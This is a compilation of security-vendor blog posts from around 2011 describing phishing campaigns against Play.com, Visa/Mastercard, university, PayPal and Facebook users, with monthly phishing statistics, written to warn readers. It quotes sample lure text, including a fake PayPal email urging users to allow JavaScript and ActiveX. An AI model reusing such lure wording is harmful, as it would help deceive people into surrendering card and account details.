Sure enough, we have an example of a scammer going phishing on Play(dot)com, the second biggest online retailer in the UK market. Play allows individuals to buy / sell their wares, much like the Amazon marketplace. Here’s an example of what I’d see while shopping for Batman DVDs (because really, what else am I going to be wasting my money on?):

Sellers are awarded ratings depending on how awesome they are at selling things – or not. Thanks to MrTom for sending this one over, because what seemed like a bargain videogame purchase resulted in the following email from a seller:

Yes, it’s the old “Problem with payment” trick so beloved of scammers on sites such as eBay (with random “verified by..” graphics to sweeten the deal) . What makes this attempt particularly silly is the following ramble regarding security:

“fill in the following secure form by clicking reply you should then be able to fill in the form. This is just for verfication and a security check  please note we do not see any of your personal details as its encrypted through our server and part of data protection”

There is, of course, no “secure form” – all the victim is doing is sending a regular email to a @live.co.uk account. It’s worth bearing in mind that a copy of said email could well be stored on the servers it passes through, which isn’t really the best thing in the World when you just sent your card details to the Wallet Inspector.

The scammers here are rather lazy, too – hyperlinking their images from other sources and causing a little brand damage in the process. You should NEVER send a seller your card details in this manner, especially if they’re claiming there are problems and asking for card details via email. Play(dot)com is setup so that you’d never have to do this – any other reputable merchant would be doing the same thing.

Unfortunately these kind of scams cause a chilling effect for new sellers and makes it more difficult to get started selling Batman DVDs – and while you’ll get your money back from the initial transaction made through the Play(dot)com system, you may find it’s a little more tricky to get results after firing the “Take my money, and take it now” emergency flare in the general direction of an Email scammer.

Christopher Boyd

We have posted already about Visa and Mastercard scams in English. We don’t see very often a dutch phishing campaign which is created after some known English phishing. Usually, Dutch phishing is related to the most important banks in Holland, but this one is trying to fool the users of Visa and Mastercard with a classical “update your credit card data”.

A Dutch colleague briefly checked the text of the email and found immediately that it is written in a bad Dutch language. Even for the someone who doesn’t speak Dutch at all (like me) it is strange to see that some punctuation seems to be missing, so for a native this is a clear sign of fraud.

The fake website says something about the International Card Services and is clearly copied (including even the tracking code) from the original website and adapted for the phishing attack. However, the fraudsters didn’t even bother to check any of the fields, so if you press Submit, you’re taken to an intermediate website which saves the data (using a form) and then redirects the browser to the real visa.nl website.

Sometimes it is quite funny to see that the fraudsters seem to forget which site they intended to phish. As a reminder: The phishing mail mentions Visa and Mastercard, the fake website mentions ICS (which is related to Visa and Mastercard, but a different website), the intermediary page shows again Visa and Mastercard, and the final website is visa.nl.

Avira users don’t have any reasons to be worried: the URL is blocked and the emails are detected as phishing.

Sorin Mustaca
Data Security Expert

As university students prepare to go back to their studies this year, their email accounts and personal information are ripe for the picking.

Today we observed phishing emails being sent to tertiary students to warn that their passwords have expired, or on a separate email, that their password will expire within 2 weeks. Both of these emails provide a convenient link to a website that promises remedy the situation.

The link in the above message points to the hxxp://[redacted].cz.cc. The cz.cc domain is a free hosting service that the phishers are using to host their forms.

The link in this message is for the URL shortening service tinylink.ca which redirects to another URL shortening service, cach.us, which redirects the user to the phishing site. The phishing page this message directs users to appears to be a hacked webserver.

It seems that the university students aren’t the only target of the phisher. Closer investigation revealed a more ambitious scam artist than normal, running 5 different phishing campaign forms on same domain. These were pages for Verizon, credit card details, university students, and two unidentified targets. All of these pages had the same generic form for victims to enter their details into, with no logos or official branding present except for an image in the footer with the text “Powered By php Form Generator”. This is an open source project aimed at making it simple for end users to create forms and manage the data people enter into them. Because they were generated in the same way, all the forms had a very similar look to them as can be seen in the two below.

The administration pages for each of the 5 phishing forms were also freely available after a bit of digging, and this was what was found on the admin page corresponding with the scam targeting education institute members (Note each email address ending in .edu):

As seen here, there were plenty of people who were willing to give their full name and email address, along with a username and password for accessing the account.

The administration pages for the other concurrent scams being run from this site weren’t quite as busy, with a maximum of 3 entries being seen in any of them at once. That, however, isn’t to say that more activity was not happening on them.

Whatever the case, this is a very basic scam pulled off by a person with probably little knowledge of the systems they were setting up. This was seen in the ease of accessing the admin pages, which required no username or password to be entered to view the admin console and interact with it.  All the fraudster required to create the pages was free hosting and the pre-made wizard for creating the forms (also bundled with the pre-made administration portal). Despite the technical simplicity, there are obviously still users out there who are willing to hand over real information about themselves to even unconvincing cyber con-artists.

Remember the tried and true advice: Don’t follow links from emails which ask for your personal details. Even if it looks like it could be real, treat unsolicited requests for personal information online as if it were someone coming up to you on the street asking you the same questions. Verify first that people are who they claim to be before you decide how much trust to put in them.

Over 200 million people have accounts on PayPal, making it a key target for internet fraudsters attempting to steal money.

One of the way that criminals try to get their hands on your cash is by phishing for your PayPal account details.

An aggressive campaign that we have seen widely spammed out in the last few hours does precisely that, pretending to be a security warning from PayPal.

From: "PayPal" <tax@ato.gov.au>

Subject: Please confirm your identity

Attached file: update-account.html

Message body:
When you will complete the document we have sent, remember to ALLOW javascript and ActiveX to run from the bar that will pop-up, otherwise we cannot verify the informations you have provided.

February 22, 2011:Valued PayPaI Member, We have reasons to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection.

OPEN AND COMPLETE THE FORM ATTACHED IN THIS MESSAGE TO REGAIN ACCESS TO YOUR ACCOUNT.

Thank you for your time and understanding, PayPal Resolution Center.

Clicking on the HTML attachment will open your web browser, and might trick you into believing that you are on the genuine PayPal webpage.

However, this attack’s intention is to trick you into handing over your credit card details, full date of birth and name and address.

If you’re ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you’ll be able to read it via the PayPal messaging system itself.

Sophos products intercept the emails being used in this latest phishing campaign, ensuring that customers are protected.

A little late this time, but here are our statistics about the phishing, spam and malware situation in January 2011!

Most abused TLDs

While the numbers for Phishing in December were almost all red, showing a dramatic drop for the .org (-151%), .com(-76%) and .net(-24%) domains, we now have seen the exact opposite development in January 2011. Phishing was definitely on the rise and even if the malware URLs still show mostly as red numbers, some of them have also increased. However, even with these high fluctuations, the top 10 remains practically unchanged from December 2010.

Spam category statistics

The trend we observed in December 2010 (overall less spam) continued in January for all categories. Here also the top 10 remains unchanged in comparison with December.

Extension statistics for malware URLs

The malicious files extensions top chart shows a descending trend, following the trend of the overall malware URLs. A newcomer in the top 10 is the extension OCX. The OCX file type is associated with ‘Object Linking and Embedding (OLE) Control Extension’ by Microsoft. These files can become infected and it are quite hard to detect as they are usually loaded by other modules. The big “looser” of this month is the HTML/HTM extension. Obviously, the cyber criminals have found better ways to spread malware than through a page which usually drops some malware on the user’s computer.

Most phished brands statistics

The most attacked brands differ only slightly from December. While in December Paypal lost a lot of its intensity, we’ve seen a comeback in form of an increase of 52% in January. However, the biggest gain of this month is Ebay with a 92% increase which makes it land on the second place with 27% from the total amount of phished brands.

URL Shorteners used in malicious activities

Also the URL shorteners have received only green numbers in January. We have seen small fluctuations within the top 10, but nothing dramatical. The most abused services in both categories – for the first time since we started this analysis – are bit.ly and tinyurl.com.

Sorin Mustaca
Data Security Expert

Our previous post about malicious links being spammed out on Facebook said that the links were phishing attempts. Well, turns out it’s also a spyware scam.

So the links we saw being sent around led to a fake Facebook log-in page:

Looks like a plain vanilla phishing attempt so far. However, further testing with a dummy account showed that something a bit more interesting is going on.

If you enter your account details into the supposed log-in page, you’re directed to this enticing notice:

Who doesn’t want a free iPad, right? If you then click on the ‘Claim Now’ buttons for any of the oh-so-lovely prizes, you then get taken to this site:

Still no prizes for far. If you click on the big shiny button on that page, you get this:

And if you do download that, you get a consolation prize of…spyware. And you just paid for it with your account details. Shortly afterwards, Facebook got back to us about some suspicious access activity in our dummy account:

No, that’s not where we are. Clicking the ‘I don’t recognize’ button led to a new password creation page, which we could use to recover the dummy account.

OK, so this scam is still not terribly new or original. We blogged about a roughly similar scam running around Twitter in August of last year.

Fortunately, the malicious links directing users to these sites are now inactive, and most of the related sites seem to be down. Our product also detects and removes the downloaded spyware.

Still, stay alert and stay safe.

- Post by Shantini

On 22/02/11 At 03:00 AM